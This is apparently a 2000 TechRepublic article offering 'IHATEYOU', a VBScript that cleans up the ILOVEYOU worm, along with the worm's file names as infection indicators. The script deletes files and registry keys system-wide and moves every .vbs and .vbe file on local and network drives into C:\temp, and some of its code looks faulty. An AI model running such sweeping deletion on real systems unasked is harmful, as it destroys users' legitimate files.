If you’re unable to get a vendor-distributed virus image to fight off the ILOVEYOU virus, here’s a quick quarantine measure that may help you contain this particularly nasty threat. Developed on the fly by TechRepublic’s own Kevin Brown, we used this tool (gratefully dubbed IHATEYOU) ourselves today to contain the spread of ILOVEYOU.
Of course, do not use this simple solution as substitute for the vendor-distributed fixes beginning to circulate. We used it, and it worked for us, but we do not guarantee that it will work in your shop. We hope it can help you get through a crazy day, though.
In short, Kevin reversed the hacker’s VB code to identify instances of VBS files created by the virus, rename them with a IHY (IHATEYOU) extension, and then move them to the C:/Temp directory. His script also undoes the three Registry changes made by ILOVEYOU and resets the infected machine’s IE home page to blank, away from the Trojan horse page installed by ILOVEYOU.
Before you run the script, you probably want to check to see if a machine is infected by searching for these files:
- MSKernel32.vbs
- Win32DLL.vbs
- LOVE-LETTER-FOR-YOU.TXT
- WinFAT32.EXE
- WIN-BUGSFIX.EXE
- script.ini
You can run IHATEYOU on a noninfected system with limited impact. Be forewarned that any legitimate VBS files installed on the system will be renamed as IHY and moved to C:/Temp. In addition, the script conflicts with the IRC instant messaging and chat service.
To use IHATEYOU, copy the following text into a text editor and save the file with a .vbs extention or click on the IHATEYOU sidebar on the right-hand navigation bar.
IHATEYOU
rem I Hate You – removes I love you virus
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=””
ctr=0
Set fso = CreateObject(“Scripting.FileSystemObject”)
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=”Undo LOVE LETTER VIRUS”
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject(“WScript.Shell”)
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
fso.DeleteFile dirsystem & “\MSKernel32.vbs”, true
fso.DeleteFile dirwin & “\Win32DLL.vbs”, true
fso.DeleteFile dirsystem & “\LOVE-LETTER-FOR-YOU.TXT.vbs”, true
fso.DeleteFile dirsystem & “\WinFAT32.EXE”, true
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regdelete “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
\CurrentVersion\Run\MSKernel32″
regdelete “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
\CurrentVersion\RunServices\Win32DLL”
downread=””
downread=regget(“HKEY_CURRENT_USER\Software
\Microsoft\Internet Explorer\Download Directory”)
if (downread=””) then
downread=”c:\”
end if
regdelete “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
\CurrentVersion\Run\WIN-BUGSFIX”
regdelete “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
\CurrentVersion\Run\WinFAT32″
regcreate “HKEY_CURRENT_USER\Software\Microsoft
\Internet Explorer\Main\Start Page”,”about:blank”
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&”\”)
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext=”vbs”) or (ext=”vbe”) or (s=”script.ini”) then
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(“c:\temp\”&”\”&bname&”.ihy”)
fso.DeleteFile f1.path, true
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regdelete(regkey)
Set regedit = CreateObject(“WScript.Shell”)
regedit.RegDelete regkey
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject(“WScript.Shell”)
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject(“WScript.Shell”)
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject(“WScript.Shell”)
end sub
sub html
On Error Resume Next
fso.DeleteFile(dirsystem&”\LOVE-LETTER-FOR-YOU.HTM”)
end sub